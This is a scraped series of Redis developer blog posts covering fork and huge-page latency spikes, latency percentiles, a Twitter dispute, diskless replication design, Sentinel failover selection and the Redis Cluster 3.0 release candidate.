Every time BGSAVE was triggered, I could see ~300 milliseconds latency spikes of unknown origin, since fork was taking 6 milliseconds. Fortunately Redis has a software watchdog feature, that is able to produce a stack trace of the process during a latency event. It’s quite a simple trick but works great: we setup a SIGALRM to be delivered by the kernel. Each time the serverCron() function is called, the scheduled signal is cleared, so actually Redis never receives it if the control returns fast enough to the Redis process. If instead there is a blocking condition, the signal is delivered by the kernel, and the signal handler prints the stack trace.

Instead of getting stack traces with the fork call, the process was always blocked near MOV* operations happening in the context of the parent process just after the fork. I started to develop the theory that Linux was “lazy forking” in some way, and the actual heavy stuff was happening later when memory was accessed and pages had to be copy-on-write-ed.

Next step was to read the fork() implementation of the Linux kernel. What the system call does is indeed to copy all the mapped regions (vm_area_struct structures). However a traditional implementation would also duplicate the PTEs at this point, and this was traditionally performed by copy_page_range(). However something changed… as an optimization years ago: now Linux does not just performs lazy page copying, as most modern kernels. The PTEs are also copied in a lazy way on faults. Here is the top comment of copy_range_range():

* Don't copy ptes where a page fault will fill them correctly.
* Fork becomes much lighter when there are big shared or private
* readonly mappings. The tradeoff is that copy_page_range is more
* efficient than faulting.

Basically as soon as the parent process performs an access in the shared regions with the child process, during the page fault Linux does the big amount of work skipped by fork, and this is why I could see always a MOV instruction in the stack trace.

While this behavior is not good for Redis, since to copy all the PTEs in a single operation is more efficient, it is much better for the traditional use case of fork() on POSIX systems, which is, fork()+exec*() in order to spawn a new process.

This issue is not EC2 specific, however virtualized instances are slower at copying PTEs, so the problem is less noticeable with physical servers.

However this is definitely not the full story. While I was testing this stuff in my Linux box, I remembered that using the libc malloc, instead of jemalloc, in certain conditions I was able to measure less latency spikes in the past. So I tried to check if there was some relation with that.

Indeed compiling with MALLOC=libc I was not able to measure any latency in the physical server, while with jemalloc I could observe the same behavior observed with the EC2 instance. To understand better the difference I setup a test with 15 million keys and a larger pipeline in order to stress more the system and make more likely that page faults of all the mmaped regions could happen in a very small interval of time. Then I repeated the same test with jemalloc and libc malloc:

bare metal, 675k/sec writes to 15 million keys, jemalloc: max spike 339 milliseconds.
bare metal, 675k/sec writes to 15 million keys, malloc: max spike 21 milliseconds.

I quickly tried to replicate the same result with EC2, same stuff, the spike was a fraction with malloc.

The next logical thing after this findings is to inspect what is the difference in the memory layout of a Redis system running with libc malloc VS one running with jemalloc. The Linux proc filesystem is handy to investigate the process internals (in this case I used /proc//smaps file).

Jemalloc memory is allocated in this region:

7f8002c00000-7f8062400000 rw-p 00000000 00:00 0
Size: 1564672 kB
Rss: 1564672 kB
Pss: 1564672 kB
Shared_Clean: 0 kB
Shared_Dirty: 0 kB
Private_Clean: 0 kB
Private_Dirty: 1564672 kB
Referenced: 1564672 kB
Anonymous: 1564672 kB
AnonHugePages: 1564672 kB
Swap: 0 kB
KernelPageSize: 4 kB
MMUPageSize: 4 kB
Locked: 0 kB
VmFlags: rd wr mr mw me ac sd

While libc big region looks like this:

0082f000-8141c000 rw-p 00000000 00:00 0 [heap]
Size: 2109364 kB
Rss: 2109276 kB
Pss: 2109276 kB
Shared_Clean: 0 kB
Shared_Dirty: 0 kB
Private_Clean: 0 kB
Private_Dirty: 2109276 kB
Referenced: 2109276 kB
Anonymous: 2109276 kB
AnonHugePages: 0 kB
Swap: 0 kB
KernelPageSize: 4 kB
MMUPageSize: 4 kB
Locked: 0 kB
VmFlags: rd wr mr mw me ac sd

Looks like here there are a couple different things.

1) There is [heap] in the first line only for libc malloc.
2) AnonHugePages field is zero for libc malloc but is set to the size of the region in the case of jemalloc.


Basically, the difference in latency appears to be due to the fact that malloc is using transparent huge pages, a kernel feature that allows to transparently glue multiple normal 4k pages into a few huge pages, which are 2048k each. This in turn means that copying the PTEs for this regions is much faster.


EDIT: Unfortunately I just spotted that I'm totally wrong, the huge pages apparently are only used by jemalloc: I just mis-read the outputs since this seemed so obvious. So on the contrary, it appears that the high latency is due to the huge pages thing for some unknown reason. So actually it is malloc that, while NOT using huge pages, is going much faster. I've no idea about what is happening here, so please disregard the above conclusions.


Meanwhile for low latency applications you may want to build Redis with “make MALLOC=libc”, however make sure to use “make distclean” before, and be aware that depending on the work load, libc malloc suffers fragmentation more than jemalloc.


More news soon…

EDIT2: Oh wait... since the problem is huge pages, this is MUCH better, since we can disable it. And I just verified that it works:

echo never > /sys/kernel/mm/transparent_hugepage/enabled

This is the new Redis mantra apparently.

UPDATE: While this seemed unrealistic to me, I experimentally verified that the huge pages memory spike is due to the fact that with 50 clients writing at the same time, with N queued requests each, the Redis process can touch in the space of *a single event loop iteration* all the process pages, so its copy-on-writing the entire process address space. This means that not only huge pages are horrible for latency, but that are also horrible for memory usage. Comments]]>
http://antirez.com/news/84
Redis latency spikes and the 99th percentile http://antirez.com/news/83 http://antirez.com/news/83 Thu, 30 Oct 2014 13:28:42 +0000
img://antirez.com/misc/stripe-latency.png

As you can guess, if you perform a latency test during the fork, all the requests crossing the moment the parent process forks will be delayed up to one second (taking as example the graph above, not sure about what was the process size nor the EC2 instance). This will produce a number of samples with high latency, and will affect the 99th percentile result.

To change instance type, configuration, setup, or whatever in order to improve this behavior is a good idea, and there are use cases where even a single request having a too high latency is unacceptable. However apparently it is not obvious how latency spikes of 1 second every 30 minutes (or more, if you use AOF with the right rewrite triggers) is very different from latency spikes which are evenly distributed in the set of requests.

With evenly distributed spikes, if the generation of a page needs to perform a number of requests to a Redis server in order to create the output, it is very likely that a page view will incur in the latency penalty: this impacts the quality of service in a great way potentially, check this link: http://latencytipoftheday.blogspot.it/2014/06/latencytipoftheday-most-page-loads.html.

However 1 second of latency every 30 minutes run is a completely different thing. For once, the percentile with good latency gets better *as the number of requests increase*, since the more the requests are, the more this second of latency will be unlikely to get over-represented in the samples (if you have just 1 request per minute, and one of those requests happen to hit the high latency, it will affect the 99.99th percentile much more than what happens with 100 requests per second).

Second: most page views will be unaffected. The only users that will see the 1 second delay are the ones that make a request crossing the fork call. All the other requests will experience an extremely low probability of hitting a request that has a latency which is significantly worse than the average latency. Also note that a page view crossing the fork time, even when composed of 100 requests, can’t be delayed for more than a second, since the requests are completed as soon as the fork() call terminates.

The bottom line here is that, if there are hard latency requirements for each single request, it is clear that a setup where a request can be delayed 1 second from time to time is a big problem. However when the goal is to provide a good quality of service, the distribution of the latency spikes have a huge effect on the outcome. Redis latency spikes due to fork on Xen are isolated points in the line of time, so they affect a percentage of page views, even when the page views are composed of a big number of Redis requests, which is proportional to the latency spike total time percentage, which is, 1 second every 1800 seconds in this case, so only the 0.05% of the page views will be affected.

Latency characteristics are hard to capture with a single metric: the full percentile curve and the distribution of the spikes, can provide a better picture. In general good rule of thumbs are a good way to start a research, and in general it is true that the average latency is a poor metric. However to promote a rule of thumb into an absolute truth has also its disadvantages, since many complex things remain complex, and in need for close inspection, regardless of our willingness to over simplify them.

At the same time, fork delays in EC2 instances are one of the worst experiences for Redis users in one of the most popular runtime environments today, so I’m starting to test Redis with EC2 regularly now: we’ll soon have EC2 specific optimization pages on the Redis official documentation, and a way to operate master-slaves replicas with persistence disabled in a safer way.

If you need EC2 + Redis master with persistence disabled now, the simplest to deploy “quick fix” is to disable automatic restarts of Redis instances, and use Sentinel for failover, so that crashed masters will not automatically return available, and will be failed over by Sentinel. The system administrator can restart the master manually after checking that the failover was successful and there is a new active master.

EDIT: Make sure to check the Hacker News thread that contains interesting information about EC2, Xen and fork time: https://news.ycombinator.com/item?id=8532851. Also not all the EC2 instances are the same, and certain types provide great fork time on pair with bare metal systems: https://redislabs.com/blog/testing-fork-time-on-awsxen-infrastructure#.VFJQ-JPF8yF Comments]]>
http://antirez.com/news/83
This is why I can’t have conversations using Twitter http://antirez.com/news/82 http://antirez.com/news/82 Wed, 29 Oct 2014 09:17:04 +0000
In the same post Stripe engineers said that they are going to switch to PostgreSQL for the use case where they have issues with Redis, which is a great database indeed, and many times if you can go with the SQL data model and an on-disk database, it is better to use that instead of Redis which is designed for when you really want to scale to a lot of complex operations per second. Stripe engineers also said that they measured the 99th percentile and it was better with PostgreSQL compared to Redis, so in a tweet @aphyr wrote:

“Note that *synchronous* Postgres replication *between AZs* delivers lower 99th latencies than asynchronous Redis”

And I replied:

“It could be useful to look at average latency to better understand what is going on, since I believe the 99% percentile is very affected by the latency spikes that Redis can have running on EC2.”

Which means, if you have also the average, you can tell if the 99th percentile is ruined (or not) by latency spikes, that many times can be solved. Usually it is as simple as that: if you have a very low average, but the 99th percentile is bad, likely it is not that Redis is running slow because, for example, operations performed are very time consuming or blocking, but instead a subset of queries are served slow because of the usual issues in EC2: fork time in certain instances, remote disks I/O, and so forth. Stuff that you can likely address, since for example, there are instance types without the fork latency issue.

For half the Twitter IT community, my statement was to promote the average latency as the right metric over 99th percentiles:

"averages are the worst possible metric for latency. No latency I've ever seen falls on a bell curve. Averages give nonsense."

"You have clearly not understood how the math works or why tail latencies matter in dist sys. I think we're done here."

“indeed; the problem is that averages are not robust in the presence of outliers”

Ehm, who said that average is a good metric? I proposed it to *detect* if there are or not big outliers. So during what was supposed to be a normal exchange, I find after 10 minutes my Twitter completely full of people that tell me that I’m an idiot to endorse averages as The New Metric For Latency in the world. Once you get the first retweets, you got more and more. Even a notable builder of other NoSQL database finds the time to lecture me a few things via Twitter: I reply saying that clearly what I wrote was that if you have 99th + avg you have a better picture of the curve and can understand if the problem is the Redis spikes on EC2, but magically the original tweet gets removed, so my tweets are now more out of context. My three tweets:

1. “may point was, even if in the internet noise I'm not sure if it is still useful, that avg helps to understand why (…)”
2. “the 99% percentile is bad. If avg is very good but 99% percentile is bad, you can suspect a few very bad samples”
3. “this is useful with Redis, since with proper config sometimes you can improve the bad latency samples a lot.”

Guess what? There is even somebody that isolated tweet #2 that was the continuation of “to understand why the 99% percentile is bad” (bad as in, is not providing good figures), and just read it out of context: “the 99% percentile is bad”.

Once upon a time, people used to argue for days on usenet, but at least there was, most of the times, an argument against a new argument and so forth, with enough text and context to have a normal condition. This instead is just amplification of hate and engineering rules 101 together. 99th latency is the right metric and average is a poor one? Make sure to don’t talk about averages even in a context where it makes sense otherwise you get 10000 shitty replies.

What to do with that? Now a good thing about me is that I’m not much affected by all this personally, but it is also clear that because I use Twitter for a matter of work, in order to inform people of what is happening with Redis, this is not a viable working environment. For example, latency: I care a lot about latency, so many efforts were done during the years in order to improve it (including diskless replication). We have monitoring as well in order to understand if and why there are latency spikes, Redis can provide you an human readable report of what is happening inside of it by monitoring different execution paths. After all this work, what you get instead is the wrong message retweeted one million times, which does not help. Most people will not follow the tweets to make an idea themselves, the reality is, at this point, rewritten: I said that average percentile is good and I don’t realize that you should look at the long tail. Next time I’ll talk about latency, for many people, I’ll be the one that has a few non clear ideas about it, so who knows what I’m talking about or what I’m doing?

At the same time Twitter is RSS for humans, it is extremely useful to keep many people updated about what I love to do, which is, to work to my open source project that so far I tried to develop with care. So I’m trying to think about what a viable setup can be. Maybe I can just blog more, and use the Redis mailing list more, and use Twitter just to link stuff so that interested people can read, and interested people can argue and have real and useful discussions.

I’ve a lot of things to do about Redis, for the users that have a good time with it, and a lot of things to do for the users that are experiencing problems. I feel like my time is best spent hacking instead of having non-conversations on Twitter. I love to argue, but this is just a futile exercise. Comments]]>
http://antirez.com/news/82
Diskless replication: a few design notes. http://antirez.com/news/81 http://antirez.com/news/81 Mon, 27 Oct 2014 16:34:15 +0000
The feature is not exactly a new idea, it was proposed several times, especially by EC2 users that know that sometimes it is not trivial for a master to provide good performances during slaves synchronization. However there are a number of use cases where you don’t want to touch disks, even running on physical servers, and especially when Redis is used as a cache. Redis replication was, in short, forcing users to use disk even when they don’t need or want disk durability.

When I returned back home I wanted to provide a quick feedback to the developers that attended the meeting, so the first thing I did was to focus on implementing the feature that seemed the most important and non-trivial among the list of identified issues. In the next weeks the attention will be moved to the Redis development process as well: the way issues are handled, how new ideas can be proposed to the Redis project, and so forth. Sorry for the delay about these other important things, for now what you can get is, some code at least ;-)

Diskless replication provided a few design challenges. It looks trivial but it is not, so since I want to blog more, I thought about documenting how the internals of this feature work. I’m sure that a blog post may make the understanding and adoption of the new feature simpler.

How replication used to work
===

Newer versions of Redis are able, when the connection with the master is lost, to reconnect with the master, and continue the replication process in an incremental way just fetching the differences accumulated so far. However when a slave is disconnected for a long time, or restarted, or it is a new slave, Redis requires it to perform what is called a “full resynchronization”.

It is a trivial concept, and means: in order to setup this slave, let’s transfer *all* the master data set to the slave. It will flush away its old data, and reload the new data from scratch, making sure it is running an exact copy of master’s data. Once the slave is an exact copy of the master, successive changes are streamed as a normal Redis commands, in an incremental way, as the master data set itself gets modified because of write commands sent by clients.

The problem was the way this initial “bulk transfer” needed for a full resynchronization was performed. Basically a child process was created by the master, in order to generate an RDB file. When the child was done with the RDB file generation, the file was sent to slaves, using non blocking I/O from the parent process. Finally when the transfer was complete, slaves could reload the RDB file and go online, receiving the incremental stream of new writes.

However this means that from the master point of view, in order to perform a full sync, we need:

1) To write the RDB on disk.
2) To load back the RDB from disk in order to send it to slaves.

“2” is not great but “1” is much worse. If AOF is active at the same time, for example, the AOF fsync() can be delayed a lot by the child writing to the disk as fast as possible. With the wrong setup, especially with non-local disks, but sometimes even because of a non perfect kernel parameters tuning, the disk pressure was cause of latency spikes that are hard to deal with. Partial resynchronizations introduced with Redis 2.8 mitigated this problem a bit, but from time to time you have to restart your slaves, or they go offline for too much time, so it is impossible to avoid full resynchronizations.

At the same time, this process had a few advantages. The RDB saving code was reused for replication as well, making the replication code simpler. Moreover while the child was producing the RDB file, new slaves could attach, and put in a queue: when the RDB was ready, we could feed multiple slaves at the same time.

All in all in many setups it works great and allows to synchronize a number of slaves at the same time. Also many users run with RDB persistence enabled in the master side, but not AOF, so anyway to persist on disk was happening from time to time. Most bare-metal users don’t have any latency at all while Redis is persisting, moreover disks, especially local disks, have easy to predict performances: once the child starts to save, you don’t really need to check for timeouts or if it is taking too much time, it will end eventually, and usually within a reasonable amount time.

For this reasons, disk-backed replication is *still* the default replication strategy, and there are no plans to remove it so far, but now we have an alternative in order to serve the use cases where it was not great.

So what is diskless replication? It is the idea that you can write directly from the child process to the slaves, via socket, without any intermediate step.

Sockets are not disks
===

The obvious problem about diskless replication is that writing to disks is different than writing to sockets. To start
the API is different, since the RDB code used to write to C FILE pointers, while to write to sockets is a matter of writing to file descriptors. Moreover disk writes don’t fail if not for hard I/O errors (for example if the disk is full), so when a write fails, you can consider the process aborted. For sockets it is different since writes can be delayed since the receiver is slow and the local kernel buffer is full. Another interesting issue is that there is to deal with timeouts: what about the receiving side to experience a failure so that it stops reading from us? Or just the TCP connection is dead but we don’t get resets, and so forth. We can’t take the child sending the RDB file to slaves active forever, there must be a way to detect timeouts.

Fortunately modifying the RDB code to write to file descriptors was trivial, because for an entirely different problem (MIGRATE/RESTORE for Redis Cluster) the code was already using an abstraction called “rio” (redis I/O), that abstracts the serialization and deserialization of Redis values in RDB format, so you can write a value to the disk,
or to an in memory buffer. What I did was to support a new “rio” target, called fdset: a set of file descriptors.
This is because as I’ll write later, we need to write to multiple file descriptors at the same time.

However this was not enough. One of the main design tradeoffs was to understand if the in memory RDB transfer would happen in one of the following two ways:

1) Way #1: produce a full RDB file in memory inside a buffer, than transfer it.
2) Way #2: directly write to slaves sockets, incrementally, as the RDB was created.

Way #1 is a lot simpler since it is basically like the on-disk writing stuff, but in a kind of RAM disk. However the obvious risk is using too much memory. Way #2 is a bit more risky, because you have to transfer while the child producing the RDB file is active. However the essence of the feature was to target environments with slow disks perhaps, but *with fast networks*, without requiring too much additional memory, otherwise the feature risks to be useless. So Way #2 was selected.

However if you stream an RDB file like this, there is a new problem to solve… how will the slave understand that EOF is reached? We don’t know, when we start the transfer, how big the transfer will be. With on-disk replication instead the size was known, so the transfer happened using just a Redis protocol “bulk” string, with prefixed length. Something like:

$92384923423\r\n
… data follows …

I was too lazy to implement some complex chunked protocol to announce incremental blocks sizes, so went for a more brute force approach. The master generates an unguessable and unlikely to collide 160 bits random string, and sends something like that to the slave:

$EOF:796f255829a040e80168f94c9fe7eda16b35e5df\r\n
… data follows …
796f255829a040e80168f94c9fe7eda16b35e5df

So basically this string, which is guaranteed (just because of infinitesimal probability) to never collide with anything inside the file, is used as the end of file mark. Trivial but works very well, and is simple.

For timeouts, since it is a blocking write process (since we are in the context of the saving child process), I just used the SO_SNDTIMEO socket option. This way we are sure that we need to make progresses, otherwise the replication process is aborted. So for now there is no way to have an hard time limit for the child lifespan, and there are in theory pathological conditions where the slave would accept just one byte every timeout-1 seconds, to create a very slow transfer setup. Probably in the future the child will monitor the transfer rate, and if it drops under a reasonable figure, will exit with an error.

Serving multiple slaves at the same time
===

Another goal of this implementation was to be able to serve multiple slaves at the same time. At first this looks impossible since once the RDB transfer starts, new slaves can’t attach, but need to wait for the current child to stop and a new one to start.

However there is a very simple trick that covers a lot of use cases, which is, once the first slave want to replicate, we wait a few seconds for others to arrive as well. This covers the obvious case of a mass resync from multiple slaves for example.

Because of this, the I/O code was designed in order to write to multiple file descriptors at the same time. Moreover
in order to parallelize the transfer even if blocking I/O is used, the code tries to write a small amount of data to each fd in a loop, so that the kernel will send the packets in the background to multiple slaves at the same time.

Probably the code itself is pretty easy to understand:

while(len) {
size_t count = len < 1024 ? len : 1024;
int broken = 0;
for (j = 0; j < r->io.fdset.numfds; j++) {
… error checking removed …

/* Make sure to write 'count' bytes to the socket regardless
* of short writes. */
size_t nwritten = 0;
while(nwritten != count) {
retval = write(r->io.fdset.fds[j],p+nwritten,count-nwritten);
if (retval <= 0) {
… error checkign removed …
}
nwritten += retval;
}
}
p += count;
len -= count;
r->io.fdset.pos += count;
… more error checking removed …
}

Note that writes are bufferized by the rio.c write target, since we want to write only when a given amount of data is available, otherwise we risk to send TCP packets with 5 bytes of data inside.

Handling partial failures
===

Handling multiple slaves is not just writing to multiple FDs, which is quite simple. A big part of the story is actually to handle a few slaves failing without requiring to block the process for all the other slaves.
File descriptors in error are marked with the related error code, and no attempt is made to write to them again.
Also the code detects if all the FDs are in error, and abort the process at all.

However when the RDB writing is terminated, the child needs to report what are the slaves that received the RDB and can continue the replication process. For this task, a unix pipe is used between the processes. The child returns an array of slave IDs and associated error state, so that the parent can do a decent job at logging errors as well.

How this changes Redis is a more deep way I thought
===

Diskless replication finally allows for a totally disk-free experience in Redis master-slaves sets.
This means we need to support this use case better. Currently replication is dangerous to run with persistence disabled, since I thought there was not a case for turning off persistence when anyway replication was going to trigger it. But now this changed… and as a result, there are already plans to support better replication in a non-disk backed environment. The same will be applied to Redis Cluster as well… which is also a good candidate for diskless operations, especially for caching use cases, where replicas can do a good job to provide data redundancy, but where it may not be too critical if crash-restart of multiple instances cause data loss of a subset of hash slots in the cluster.

ETA
===

The code is already available in beta here: https://github.com/antirez/redis/commits/memsync
It will be merged into unstable in the next days, but the plan is to wait a bit for feedbacks and bug reports, and later merge into 3.0 and 2.8 as well. The feature is very useful and it has little interactions with the rest of the Redis core when it is turned off. The plan is to just back port it everywhere and release it as “experimental” for some time. Comments]]>
http://antirez.com/news/81
A few arguments about Redis Sentinel properties and fail scenarios. http://antirez.com/news/80 http://antirez.com/news/80 Tue, 21 Oct 2014 15:18:10 +0000
“OH on Redis Sentinel "They kill -9'd the master, which caused a split brain..."
“then the old master popped up with no data and replicated the lack of data to all the other nodes. Literally had to restore from backups."

OMG we have some nasty bug I thought. However I tried to get more information from Kyle, and he replied that the users actually disabled disk persistence at all from the master process. Yep: the master was configured on purpose to restart with a wiped data set.

Guess what? A Twitter drama immediately started. People were deeply worried for Redis users. Poor Redis users! Always in danger.

However while to be very worried is a trait of sure wisdom, I want to take the other path: providing some more information. Moreover this blog post is interesting to write since actually Kyle, while reporting the problem with little context, a few tweets later was able to, IMHO, isolate what is the true aspect that I believe could be improved in Redis Sentinel, which is not related to the described incident, and is in my TODO list for a long time now.

But before, let’s check a bit more closely the behavior of Redis / Sentinel about the drama-incident.

Welcome to the crash recovery system model
===

Most real world distributed systems must be designed to be resilient to the fact that processes can restart at random. Note that this is very different from the problem of being partitioned away, which is, the inability to exchange messages with other processes. It is, instead, a matter of losing state.

To be more accurate about this problem, we could say that if a distributed algorithm is designed so that a process must guarantee to preserve the state after a restart, and fails to do this, it is technically experiencing a bizantine failure: the state is corrupted, and the process is no longer reliable.

Now in a distributed system composed of Redis instances, and Redis Sentinel instances, it is fundamental that rebooted instances are able to restart with the old data set. Starting with a wiped data set is a byzantine failure, and Redis Sentinel is not able to recover from this problem.

But let’s do a step backward. Actually Redis Sentinel may not be directly involved in an incident like that. The typical example is what happens if a misconfigured master restarts fast enough so that no failure is detected at all by Sentinels.

1. Node A is the master.
2. Node A is restarted, with persistence disabled.
3. Sentinels (may) see that Node A is not reachable… but not enough to reach the configured timeout.
4. Node A is available again, except it restarted with a totally empty data set.
5. All the slave nodes B, C, D, ... will happily synchronize an empty data set form it.

Everything wiped from the master, as per configuration, after all. And everything wiped from the slaves, that are replicating from what is believed to be the current source of truth for the data set.

Let’s remove Sentinel from the equation, which is, point “3” of the above time line, since Sentinel did not acted at all in the example scenario.

This is what you get. You have a Redis master replicating with N slaves. The master is restarted, configured to start with a fresh (empty) data set. Salves replicate again from it (an empty data set).
I think this is not a big news for Redis users, this is how Redis replication works: slaves will always try to be the exact copy of their masters. However let’s consider alternative models.

For example Redis instances could have a Node ID which is persisted in the RDB / AOF file. Every time the node restarts, it loads its Node ID. If the Node ID is wrong, slaves wont replicate from the master at all. Much safer right? Only marginally, actually. The master could have a different misconfiguration, so after a restart, it could reload a data set which is weeks old since snapshotting failed for some reason.
So after a bad restart, we still have the right Node ID, but the dataset is so old to be basically, the same as being wiped more or less, just more subtle do detect.

However at the cost of making things only marginally more secure we now have a system that may be more complex to operate, and slaves that are in danger of not replicating from the master since the ID does not match, because of operational errors similar to disabling persistence, except, a lot less obvious than that.

So, let’s change topic, and see a failure mode where Sentinel is *actually* involved, and that can be improved.

Not all replicas are the same
===

Technically Redis Sentinel offers a very limited set of simple to understand guarantees.

1) All the Sentinels will agree about the configuration as soon as they can communicate. Actually each sub-partition will always agree.
2) Sentinels can’t start a failover without an authorization from the majority of Sentinel processes.
3) Failovers are strictly ordered: if a failover happened later in time, it has a greater configuration “number” (config epoch in Sentinel slang), that will always win over older configurations.
4) Eventually the Redis instances are configured to map with the winning logical configuration (the one with the greater config epoch).

This means that the dataset semantics is “last failover wins”. However the missing information here is, during a failover, what slave is picked to replace the master? This is, all in all, a fundamental property. For example if Redis Sentinel fails by picking a wiped slave (that just restarted with a wrong configuration), *that* is a problem with Sentinel. Sentinel should make sure that, even within the limits of the fact that Redis is an asynchronously replicated system, it will try to make the best interest of the user by picking the best slave around, and refusing to failover at all if there is no viable slave reachable.

This is a place where improvements are possible, and this is what happens today to select a slave when the master is failing:

1) If a slaves was restarted, and never was connected with the master after the restart, performing a successful synchronization (data transfer), it is skipped.
2) If the slave is disconnected from its master for more than 10 times the configured timeout (the time a master should be not reachable for the set of Sentinels to detect a master as failing), it is considered to be non elegible.
3) Out of the remaining slaves, Sentinel picks the one with the best “replication offset”.

The replication offset is a number that Redis master-slave replication uses to take a count of the amount of bytes sent via the replication channel. it is useful in many ways, not just for failovers. For example in partial resynchronizations after a net split, slaves will ask the master, give me data starting from offset X, which is the last byte I received, and so forth.

However this replication number has two issues when used in the context of picking the best slave to promote.

1) It is reset after restarts. This sounds harmless at first, since we want to pick slaves with the higher number, and anyway, after a restart if a slave can’t connect, it is skipped. However it is not harmless at all, read more.
2) It is just a number: it does not imply that a Redis slave replicated from *a given* master.

Also note that when a slave is promoted to master, it inherits the master’s replication offset. So modulo restarts, the number keeps increasing.

Why “1” and/or “2” are suboptimal choices and can be improved?

Imagine this setup. We have nodes A B C D E.
D is the current master, and is partitioned away with E in a minority partition. E still replicates from D, everything is fine from their POV.

However in the majority partition, A B C can exchange messages, and A is elected master.
Later A restarts, resetting its offset. B and C replicate from it, starting again with lower offsets.
After some time A fails, and, at the same time, E rejoins the majority partition.

E has a data set that is less updated compared to the B and C data set, however its replication offset is higher. Not just that, actually E can claim it was recently connected to its master.

To improve upon this is easy. Each Redis instance has a “runid”, an unique ID that changes for each new Redis run. This is useful in partial resynchronizations in order to avoid getting an incremental stream from a wrong master. Slaves should publish what is the last master run id they replicated successful from, and Sentinel failover should make sure to only pick slaves that replicated from the master they are actually failing over.

Once you tight the replication offset to a given runid, what you get is an *absolute* meter of how much updated a slave is. If two slaves are available, and both can claim continuity with the old master, the one with the higher replication offset is guaranteed to be the best pick.

However this also creates availability concerns in all the cases where data is not very important but availability is. For example if when A crashes, only E becomes available, even if it used to replicate from D, it is still better than nothing. I would say that when you need an highly available cache and consistency is not a big issue, to use a Redis cluster ala-memcached (client side consistent hashing among N masters) is the way to go.

Note that even without checking the runid, to make the replication offsets durable after a restart, already improves the behavior considerably. In the above example E would be picked only if when isolated in a minority partition with the slave, received more writes than the other slaves in the majority side.

TLDR: we have to fix this. It is not related to restarting masters without a dataset, but is useful to have a more correct implementation. However this will limit only a class of very-hard-to-trigger issues.

This is in my TODO list for some time now, and congrats to Aphyr for identifying a real implementation issue in a matter of a few tweets exchanged. About the failure reported by Aphyr from the unknown company, I don’t think it is currently viable to try to protect against serious misconfigurations, however it is a clear sign that we need better Sentinel docs which are more incremental compared to the ones we have now, that try to describe how the system works. A wiser approach could be to start with a common sane configuration, and “don’t do” list like, don’t turn persistence off, unless you are ok with wiped instances. Comments]]>
http://antirez.com/news/80
Redis cluster, no longer vaporware. http://antirez.com/news/79 http://antirez.com/news/79 Thu, 09 Oct 2014 14:35:23 +0000
Basically it is a roughly 4 years old project. This is about two thirds the whole history of the Redis project. Yet, it is only today, that I’m releasing a Release Candidate, the first one, of Redis 3.0.0, which is the first version with Cluster support.

An erratic run


To understand why it took so long is straightforward: I started the cluster project with a lot of rush, in a moment where it looked like Redis was going to be totally useless without an automatic way to scale.
It was not the right moment to start the Cluster project, simply because Redis itself was too immature, so we didn't yet have a solid “single instance” story to tell.

While I did the error of starting a project with the wrong timing, at least I didn’t fell in the trap of ignoring the requests arriving from the community, so the project was stopped and stopped an infinite number of times in order to provide more bandwidth to other fundamental features. Persistence, replication, latency, introspection, received a lot more care than cluster, simply because they were more important for the user base.

Another limit of the project was that, when I started it, I had no clue whatsoever about distributed programming. I did a first design that was horrible, and managed to capture well only what were the “products” requirement: low latency, linear scalability and small overhead for small clusters. However all the details were wrong, and it was far more complex than it had to be, the algorithms used were unsafe, and so forth.

While I was doing small progresses I started to study the basics of distributed programming, redesigned Redis Cluster, and applied the same ideas to the new version of Sentinel. The distributed programming algorithms used by both systems are still primitive since they are asynchronous replicated, eventually consistent systems, so I had no need to deal with consensus and other non trivial problems. However even when you are addressing a simple problem, compared to writing a CP store at least, you need to understand what you are doing otherwise the resulting system can be totally wrong.

Despite all this problems, I continued to work at the project, trying to fix it, fix the implementation, and bring it to maturity, because there was this simple fact, like an elephant into a small room, permeating all the Redis Community, which is: people were doing again and again, with their efforts, and many times in a totally broken way, two things:

1) Sharding the dataset among N nodes.
2) A responsive failover procedure in order to survive certain failures.

Problem “2” was so bad that at some point I decided to start the Redis Sentinel project before Cluster was finished in order to provide an HA system ASAP, and one that was more suitable than Redis Cluster for the majority of use cases that required just “2” and not “1”.

Finally I’m starting to see the first real-world result of this efforts, and now we have a release candidate that is the fundamental milestone required to get adoption, fix the remaining bugs, and improve the system in a more incremental way.

What it actually does?


Redis Cluster is basically a data sharding strategy, with the ability to reshard keys from one node to another while the cluster is running, together with a failover procedure that makes sure the system is able to survive certain kinds of failures.

From the point of view of distributed databases, Redis Cluster provides a limited amount of availability during partitions, and a weak form of consistency. Basically it is neither a CP nor an AP system. In other words, Redis Cluster does not achieve the theoretical limits of what is possible with distributed systems, in order to gain certain real world properties.

The consistency model is the famous “eventual consistency” model. Basically if nodes get desynchronized because of partitions, it is guaranteed that when the partition heals, all the nodes serving a given key will agree about its value.

However the merge strategy is “last failover wins”, so writes received during network partitions can be lost. A common example is what happens if a master is partitioned into a minority partition with clients trying to write to it. If when the partition heals, in the majority side of the partition a slave was promoted to replace this master, the writes received by the old master are lost.

This in turn means that Redis Cluster does not have to take meta data in the data structures in order to attempt a value merge, and that the fancy commands and data structures supported by Redis are also supported by Redis Cluster. So no additional memory overhead, no API limits, no limits in the amount of elements a value can contain, but less safety during partitions.

It is trivial to understand that in a system designed like Redis Cluster is, nodes diverging are not good, so the system tries to mitigate its shortcomings by trying to limit the probability of two nodes diverging (and the amount of divergence). This is achieved in a few ways:

1) The minority side of a partition becomes not available.
2) The replication is designed so that usually the reply to the client, and the replication stream to slaves, is sent at the same time.
3) When multiple slaves are available to failover a master, the system will try to pick the one that appears to be less diverging from the failed master.

This strategies don’t change the theoretical properties of the system, but add some more real-world protection for the common Redis Clusters failure modes.

For the Redis API and use case, I believe this design makes sense, but in the past many disagreed. However my opinion is that each designer is free to design a system as she or he wishes, there is just one rule: say the truth, so Redis Cluster documents its limits and failure modes clearly in the official documentation.

It’s the user, and the use case at hand, that will make a system useful or not. My feeling is that after six years users continued to use Redis even without any clustering support at all, because the use case made this possible, and Redis offers certain specific features and performances that made it very suitable to address certain problems. My hope is that Redis Cluster will improve the life of many of those users.

The road ahead


Finally we have a minimum viable product to ship, which is stable enough for users to seriously start testing and in certain cases adopt it already. The more adoption, the more we improve it. I know this from Redis and Sentinel: now there is the incremental process that moves a software forward from usable to mature. Listening to users, fixing bugs, covering more code in tests, …

At the same time, I’m starting to think at the next version of Redis Cluster, improving v1 with many useful things that was not possible to add right now, like multi data center support, more write safety in the minority partition using commands replay, automatic nodes balancing (now there is to reshard manually if certain nodes are too empty and other too full), and many more things.

Moreover, I believe Redis Cluster could benefit from a special execution mode specifically designed for caching, where nodes accept writes to hash slots they are not in charge for, in order to stay available in a minority partition.

